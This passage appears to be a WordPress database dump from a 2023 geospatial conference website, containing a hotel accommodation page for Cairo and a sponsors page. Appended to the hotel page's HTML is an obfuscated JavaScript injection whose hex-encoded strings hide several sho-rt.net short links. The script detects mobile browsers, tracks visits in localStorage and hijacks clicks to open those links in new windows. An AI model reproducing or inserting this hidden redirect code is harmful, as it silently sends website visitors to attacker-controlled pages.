border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4788\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Grand Nile Tower Hotel\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 class=\"cmp-teaser__title\" style=\"text-align: center;\"><span style=\"color: #3366ff;\">InterContinental Cairo Semiramis</span></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_btn title=\"BOOK NOW\" style=\"custom\" custom_background=\"#4169e1\" custom_text=\"#ffffff\" align=\"center\" button_block=\"true\" link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xNCUyMTFtOCUyMTFtMyUyMTFkODYzLjQ0NTk0ODY2NjA1NDMlMjEyZDMxLjIzMTk4OTk5OTk5OTk5NiUyMTNkMzAuMDQzMDYlMjEzbTIlMjExaTEwMjQlMjEyaTc2OCUyMTRmMTMuMSUyMTNtMyUyMTFtMiUyMTFzMHgxNDU4NDBjZjExOGU2MWNmJTI1M0EweGFmNGFlZTFhNTU5ODY1M2QlMjEyc0ludGVyQ29udGluZW50YWwlMjUyMENhaXJvJTI1MjBTZW1pcmFtaXMlMjUyQyUyNTIwYW4lMjUyMElIRyUyNTIwSG90ZWwlMjE1ZTAlMjEzbTIlMjExc2VuJTIxMnNlZyUyMTR2MTY4NzcyMDQ1NTgzNSUyMTVtMiUyMTFzZW4lMjEyc2VnJTIyJTIwd2lkdGglM0QlMjI2MDAlMjIlMjBoZWlnaHQlM0QlMjI0NTAlMjIlMjBzdHlsZSUzRCUyMmJvcmRlciUzQTAlM0IlMjIlMjBhbGxvd2Z1bGxzY3JlZW4lM0QlMjIlMjIlMjBsb2FkaW5nJTNEJTIybGF6eSUyMiUyMHJlZmVycmVycG9saWN5JTNEJTIybm8tcmVmZXJyZXItd2hlbi1kb3duZ3JhZGUlMjIlM0UlM0MlMkZpZnJhbWUlM0U=\"][/vc_column][vc_column width=\"1/2\"][dt_media_gallery_carousel image_border_radius=\"0px\" slides_on_wide_desk=\"1\" slides_on_desk=\"1\" slides_on_lapt=\"1\" slides_on_h_tabs=\"1\" slides_on_v_tabs=\"1\" stage_padding=\"10\" autoplay=\"y\" autoplay_speed=\"3000\" project_icon_color=\"#ffffff\" project_icon_border_width=\"0px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" show_bullets=\"y\" bullets_h_offset=\"0px\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-06-25 19:23:38','2023-06-25 19:23:38','',2685,'https://gsw2023.com/?p=4846',0,'revision','',0),
(4847,4,'2023-06-27 06:46:55','2023-06-27 06:46:55','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px 